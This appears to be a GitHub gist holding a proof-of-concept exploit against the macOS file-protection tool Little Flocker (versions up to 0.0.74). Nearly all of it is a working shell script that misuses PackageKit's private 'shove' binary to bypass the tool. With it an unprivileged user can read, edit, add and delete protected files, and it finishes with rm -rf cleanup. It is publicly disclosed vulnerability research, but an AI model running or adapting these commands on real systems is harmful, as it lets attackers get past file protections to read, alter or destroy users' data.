@pwnsdx

pwnsdx/ff.sh

Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT) && $(find /tmp/prepwn$DIRTOEDIT -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOEDIT $DIRTOEDIT; rm -rf /tmp/prepwn
# [edit or add files at /tmp/pwned then...]
DIRTOEDIT="$HOME/Desktop/test"; $(find /tmp/pwned$DIRTOEDIT -exec sh -c 'if [ -d "/tmp/pwned$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/pwned$DIRTOEDIT $DIRTOEDIT; rm -rf /tmp/pwned
# Delete files (unprivileged)
DIRTODELETE="$HOME/Desktop/test"; mkdir /tmp/todelete; /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTODELETE /tmp/todelete; rm -rf /tmp/todelete